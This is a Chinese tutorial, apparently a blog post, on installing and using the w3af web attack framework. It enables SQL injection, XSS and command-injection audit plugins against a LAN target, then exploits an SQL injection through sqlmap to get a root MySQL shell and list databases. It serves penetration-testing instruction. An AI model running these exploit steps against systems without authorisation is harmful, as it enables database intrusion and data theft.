w3af简单使用教程
w3af(Web Application Attack and Audit Framework)是一个Web应用程序攻击和审计框架。它的目标是创建一个易于使用和扩展、能够发现和利用Web应用程序漏洞的主体框架。w3af的核心代码和插件完全由Python编写。项目已有超过130个的插件,这些插件可以检测SQL注入、跨站脚本、本地和远程文件包含等漏洞。
./w3af_gui:
www.jianshu.com
执行w3af_gui,报错提示no module named webkit。安装webkit:
(1)下载 wget http://ftp.br.debian.org/debian/pool/main/p/pywebkitgtk/python-webkit_1.1.8-3_amd64.deb wget http://ftp.br.debian.org/debian/pool/main/w/webkitgtk/libjavascriptcoregtk-1.0-0_2.4.11-3_amd64.deb wget http://ftp.br.debian.org/debian/pool/main/w/webkitgtk/libwebkitgtk-1.0-0_2.4.11-3_amd64.deb wget http://ftp.br.debian.org/debian/pool/main/p/python-support/python-support_1.0.15_all.deb (2)安装依赖和软件包 dpkg -i libjavascriptcoregtk-1.0-0_2.4.11-3_amd64.deb dpkg -i python-support_1.0.15_all.deb dpkg -i libwebkitgtk-1.0-0_2.4.11-3_amd64.deb dpkg -i python-webkit_1.1.8-3_amd64.deb (3)安装libwebkitgtk依赖 apt-get install 即可。
./w3af_console:
w3af>>> plugins //进入插件模块,插件启动 w3af/plugins>>> crawl find_backdoors phpinfo web_spider //启用find_backdoors phpinfo web_spider这三个插件 w3af/plugins>>> list audit //列出所有用于漏洞的插件 w3af/plugins>>> audit blind_sqli file_upload os_commanding sqli xss //启用blind_sqli file_upload os_commanding sqli xss这五个插件 w3af/plugins>>> list output //设置输出插件 w3af/plugins>>> output config text_file w3af/plugins/output/config:text_file>>> set output_file 输出文件名 w3af/plugins>>> back //返回主模块 w3af>>> target //进入配置目标的模块 w3af/config:target>>> set target http://192.168.244.132/ //把目标设置为http://192.168.244.132/ w3af/config:target>>> back //返回主模块 w3af>>> start //开始
漏洞利用配置:
w3af>>> exploit //进入漏洞利用模块 w3af/exploit>>> list exploit //列出所有用于漏洞利用的插件 w3af/exploit>>> exploit sqlmap //使用sqlmap进行SQL注入漏洞的测试
--- Trying to exploit using vulnerability with id: [1010, 1011]. Please wait... Vulnerability successfully exploited. This is a list of available shells and proxies: - [0] <sql object ( dbms: "MySQL >= 5.0.0" | ruser: "root@localhost" )> Please use the interact command to interact with the shell objects. --- //测试存在SQL注入漏洞 //这里要记住shell objects(这里是0),等一下要用到 0x07 漏洞利用 w3af/exploit>>> interact 0 //interact + shell object就可以利用了 --- Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the sqlmap shell w3af/exploit/sqlmap-0>>> --- //sqlmap的一个交互式模块 w3af/exploit/sqlmap-0>>> dbs --- Available databases: [3]: [*] information_schema [*] members [*] mysql --- //成功获得数据库信息